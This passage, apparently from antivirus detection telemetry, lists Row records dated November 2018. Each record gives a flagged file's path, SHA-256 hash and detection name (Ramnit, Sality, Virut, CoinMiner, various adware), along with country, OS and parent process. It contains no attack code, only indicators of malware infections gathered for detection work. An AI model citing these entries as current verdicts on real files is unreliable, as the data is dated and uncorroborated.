  Row(detection=Row(filename='tmp0023f452', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f452', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:15:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='downloader-fuer-chess3_setup.exe', filepath='H:\\Dokumente und Einstellungen\\LocalAdmin\\Eigene Dateien\\Downloads\\Downloader-fuer-chess3_setup.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ba73e11188a5bbe09ed202cdaddaecd29001007fc81326b63e4837a9881a12ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=4848960, timestamp='2018-11-04T17:52:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adobexmp.dll', filepath='D:\\Program Files\\Adobe\\Acrobat 7.0\\Acrobat\\AdobeXMP.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='bcc6bfb1229f670c8dfd9222478cdfdae1649a19b580b0ce85097826dc8f137d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\DesktopLayer专杀.exe', parentsize=258048, timestamp='2018-11-04T13:36:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023df9d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023df9d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:55:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsfCF0D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:27:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='the lean startup. eric riec_.exe', filepath='G:\\\xa0\\VET\\The Lean Startup. ERIC RIEC_.exe', filesize=3712000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='d4f814c329840441a026338f34f3ea7247fa21c295afc956920a26d89cad6947', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T09:18:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gsdx32-sse4.dll', filepath='C:\\Users\\X\\Downloads\\pcsx2-v1.5.0-dev-2014-gb2a2a3a-windows-x86\\plugins\\GSdx32-SSE4.dll', filesize=2432000, name='W32/Ramnit.CD.#M1.#R1'), hash='e5c29a5aecab775d5e3321bd1499395d2cf38aedb326c533f348cc275a0a5ff2', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-04T14:15:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nstC242.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T06:39:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsn8842.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\fotor_3.41.exe', parentsize=268416568, timestamp='2018-11-04T04:09:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2_17_0_0.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\2_17_0_0.html', filesize=236000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='fc2f7e5fb2627fe9069b03dc2b945ef92ecce808bb02d9b847d9e6340c4300d9', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f970770bcc81d2cd755852fe59a587caa2d16f5ec03a7877e56650cdef4754ef', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F970770BCC81D2CD755852FE59A587CAA2D16F5EC03A7877E56650CDEF4754EF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f970770bcc81d2cd755852fe59a587caa2d16f5ec03a7877e56650cdef4754ef', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:50Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='uninstall.exe', filepath='F:\\TABLET PHONE\\RGK.S4\\New folder (2)\\USB drivers_3\\USB drivers\\FlashUSB_Driver\\X64\\uninstall.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='35fa475f7cd2c806f197c0bed62b3e766e5e9ebc122140b9ba17ea43a58d151b', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-02T02:17:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='common.exe', filepath='C:\\Users\\X\\Documents\\Guid\\Common\\Common.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T18:15:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121642-25624987', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_67137dca\\AVSCAN-20181102-121614-21CC8359\\AVSCAN-20181102-121642-25624987', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='4bb35ea756d240fbf25310581d51df02fca4299705c9e4abd48f0d2b601df2df', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tabletools.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\plugins\\tabletools\\tabletools.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:28:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2af746c571d7b0473e5255e68331ad4bf23e9c15596db399883ab1677dbc4a1c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-2.available\\Avira\\2AF746C571D7B0473E5255E68331AD4BF23E9C15596DB399883AB1677DBC4A1C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2af746c571d7b0473e5255e68331ad4bf23e9c15596db399883ab1677dbc4a1c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T06:03:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cycclient.exe', filepath='D:\\掃瞄資料\\ksII\\CycClient.exe', filesize=12800000, name='W32/Alman.BB.#M1.#R1'), hash='1c34853a7fb0986859e6d0202e4a093042e32773aaf7903ce2012434a0ebefc9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:13:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-010458-999620d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29031212\\AVSCAN-20181102-010144-894F333E\\AVSCAN-20181102-010458-999620D9', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:05:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130921-68d3162e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-130921-68D3162E', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:09:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\Temp\\TrustedInstaller.exe', filesize=192000, name='BDS/Androm.EB.73.#M1.#R1'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:28:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T18:32:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d274', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d274', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:50:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL2\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1274d6acfe66ff0d15e9f18aabc912135dda52fb2655b5746cac5c84a31bad0e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2009.pif', filepath='D:\\DOKUMENKU\\KOMPOSISI DANA\\2009\\2009.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\DOWNLOADS\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T19:38:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160023-efbd680c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160023-EFBD680C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='raidreconstructor.exe', filepath='C:\\Users\\X\\Desktop\\Hirens 7\\HBCD\\Programs\\RAIDReconstructor.exe', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Update \\\\\\/Quiet  \\\\\\/InstallFile \\\\\\"C:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\Install.esd\\\\\\" \\\\\\/progressCLSID 06cfe2c4-1c5b-4002-bca2-d0667fe5b626 \\\\\\/ReportId {C3BD4254-41A1-4918-A51A-1C74251DF7F3}.201 \\\\\\"\\\\\\/ClientId\\\\\\" \\\\\\"1eeffbbd-5a32-4a02-af22-5323b7db6150\\\\\\" \\\\\\"\\\\\\/CorrelationVector\\\\\\" \\\\\\"pR8P7z\\\\\\/JgEW3X9Vd.5.1.2\\\\\\" \\\\\\/WUCachedFileName \\\\\\"17134.1.180410-1804.rs4_release_CLIENTCONSUMER_RET_x86FRE_en-us.esd\\\\\\"', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=697528, timestamp='2018-11-02T20:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe598_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe598 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T22:19:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL10\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1377155317986c05ee7c9e4ae32f1c0e3333f9819269013f728eeebfe6141af6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='extras.htm', filepath='C:\\Program Files (x86)\\Corel\\CorelDRAW Graphics Suite X4\\Setup\\Lang\\BR\\Custom\\Extras.htm', filesize=236000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='0238ace1edf773dd507360e72dc00d65dd8edc658a12c3a3b0ec5401af8f8c4d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T01:47:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:00Z'), dt=datetime.date(2018, 11, 2)),
